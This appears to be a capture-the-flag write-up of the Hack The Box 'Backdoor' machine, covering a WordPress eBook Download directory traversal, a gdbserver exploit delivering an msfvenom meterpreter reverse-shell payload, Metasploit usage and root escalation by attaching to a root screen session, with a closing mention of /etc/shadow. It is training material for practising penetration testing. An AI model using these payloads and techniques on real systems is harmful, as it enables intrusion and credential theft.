In this post, I would like to share a walkthrough of the Backdoor Machine from Hack the Box


This room has been considered difficulty rated as an Easy machine on Hack The box

What will you gain from Backdoor machine?


For the user flag, you will use WordPress eBook Directory Traversal and use gdbserver exploit. For gdbserver exploit, i display two methods to get the user shell by manually exploiting and exploit using Metasploit


As for the root flag, you need to use SUID “shell” to get a root shell

Information Gathering on Backdoor Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 


From the Nmap output, we only found ports 22 and 80 which leads to http://backdoor.htb


Let’s access the website interface to find any vulnerability that we can exploit


Sadly, we didn’t find anything that we can use for further escalation, but I notice the website has been powered by WordPress


Let’s run wpscan where it will show any vulnerability on WordPress


It will take some time to retrieve the result.


However, we can manually check the WordPress directory


Based on my experience using WordPress, normally there should be something on /wp-content/plugins


As a result of my research on the WordPress interface, we notice there’s an ebook-download directory that we can use in the future.


There’s a blank page when trying to access the filedownload.php file on the website.


Let’s do some research on the ebook-download exploit on the internet

Source: WordPress Plugin eBook Download 1.1 – Directory Traversal – PHP webapps Exploit (exploit-db.com)

From the result, we have found out that the ebook download is vulnerable to Local File Inclusion (LFI) which we can take advantage of.


We can test the Local File Inclusion by using the Burpsuite tool, but we also can use wfuzz to get an exact directory of the LFI.


We should be moving forward a little bit; we success retrieve one code that shows on gdbserver on port 1337

Step 1: msfvenom modules and


However, we were required to create malicious malware by using the msfvenom command such as msfvenom -p Linux/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<any port> -f elf -o <filename>.elf


Let’s start gdb on our attacker’s machine


Let’s access the machine using port 1337 by executing the command “target extended-remote 10.10.11.125:1337


Sadly, the connection timed out.


We need to run it for the second time.


Finally, we need to run the following command as below:

remote put <filename>.elf <filename>.elf
set remote exec-file /home/user/<filename>.elf
show remote exec-file

You can start NC listener on your attacker’s machine


For us to retrieve our reverse shell connection back to us, we need to execute the following command

b main
run

Voila! We successfully retrieve the reverse shell connection back to us but we cannot obtain a proper shell

Step 2: Metasploit


I will skip the first step of metasploit usage while i will focusing on the execution of metasploit.


For this activity, we will be using multi/gdb/gdb_server_exec as our exploit from metasploit module


The screenshot above is an example of the settings that we should focus on with the exploit.


However, i almost forgot about the payload of the exploit which we need to execute the command “set payload linux/x64/meterpreter/reverse_tcp before proceeding with the command “run


At last, we have managed to get a meterpreterr by using those exploits with the configuration shown previously.


By typing the command shell will create channel 1 (metasploit way of shell).


We need to execute the command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ to obtain an interactive shell


As usual, we can read the user flag by running the “cat user.txt” command

Escalate to Root Privileges Access


We can run the command ps aux so that we can sight the process that runs on the victim’s machine


Uwu! We notice that the screen have been running on the machine as “SCREEN -dmS root


For those who are not familiar with Screen, it’s a terminal multiplexer which you can start a session with screen and can open any number of virtual terminals within that session.

Source: screen | GTFOBins

After reading on GTFOBins website, there are a few commands that we can take advantage of here.


When we execute the command screen -x root,an error such as “Must be connected to a terminal


The error occurs might be because we didn’t obtain a full proper shell here. For us to obtain a full proper shell here, we should execute the following command before trying again

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

We managed to obtain a root shell on the terminal


As usual, we can read the root flag by running the “cat root.txt” command


-THE END-


Happy Learning Guys!

Extra Information


We can go to /etc/shadow so that we can unlock and read the write-up